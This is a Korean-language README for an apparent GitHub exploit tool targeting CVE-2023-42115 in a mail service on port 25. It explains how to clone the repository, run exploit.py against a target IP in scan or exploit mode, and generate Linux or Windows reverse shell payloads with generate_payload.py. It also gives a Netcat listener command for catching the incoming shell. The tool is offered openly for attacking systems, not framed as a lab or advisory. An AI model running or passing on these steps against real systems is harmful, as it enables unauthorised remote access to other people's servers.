
이 모듈은 CVE-2023-42115로 식별된 대상 서비스의 취약점을 악용합니다.
이 저장소에는 두 개의 Python 스크립트가 포함되어 있습니다:
exploit.py: CVE-2023-42115를 익스플로잇하는 스크립트.generate_payload.py: 리버스 셸 페이로드를 생성하는 스크립트.스크립트를 실행하기 전에 시스템에 Python 3가 설치되어 있는지 확인하십시오.
git clone https://github.com/isotaka134/cve-2023-42115.git
cd cve-2023-42115
pip를 사용하여 필요한 Python 라이브러리를 설치합니다. 다음 명령을 실행하여 requirements.txt에 나열된 모든 필수 의존성을 설치하십시오:
pip install -r requirements.txt
exploit.py
이 스크립트는 CVE-2023-42115 취약점을 익스플로잇합니다.
python exploit.py -t <target_ip> -p <target_port> [options]
옵션:
-t: 대상의 IP 주소.
-p: 대상 서비스의 포트.
예시:
python exploit.py -t 192.168.1.10 -p 25 --mode SCAN
python exploit.py -t 192.168.1.10 -p 25 --mode EXPLOIT -f /path/to/payload.sh
generate_payload.py
이 스크립트는 사용자 입력을 기반으로 리버스 셸 페이로드를 생성합니다.
python generate_payload.py
단계:
스크립트는 다음 정보를 입력하도록 요청합니다:
A. 페이로드 유형 ( linux 또는 windows)
B. 로컬 IP: 리버스 연결을 위한 주소
C. 로컬 포트: 리버스 연결을 위한 포트 참고: 라우터 뒤에 있거나 NAT를 사용 중인 경우 Netcat을 실행 중인 장치로 올바른 포트 포워딩을 설정했는지 확인하십시오.
D. 출력 파일 이름 (예: Linux의 경우 payload.sh 또는 Windows의 경우 payload.ps1)
예시:
python generate_payload.py
Payload Generator
Enter payload type (linux/windows): Linux
Enter local IP address: 127.0.0.1
Enter local port: 4444
Enter output file name (e.g., payload.sh or payload.ps1): Payload.sh
Payload saved to Payload.sh
리버스 셸을 잡기 위해 로컬 머신에 리스너를 설정해야 합니다. 이를 위해 Netcat (nc)을 사용할 수 있습니다.
nc -lvnp <YOUR_LOCAL_PORT>
nc -lvnp <YOUR_LOCAL_PORT>
이 단계를 따르면 CVE-2023-42115를 익스플로잇하고 리버스 셸 연결을 받을 수 있는 페이로드를 만들고 사용할 수 있습니다.
개선 사항에 대한 제안이 있거나 기여하고 싶다면 이슈를 열거나 풀 리퀘스트를 제출해 주세요.
질문이나 지원이 필요하면 다음으로 연락해 주세요: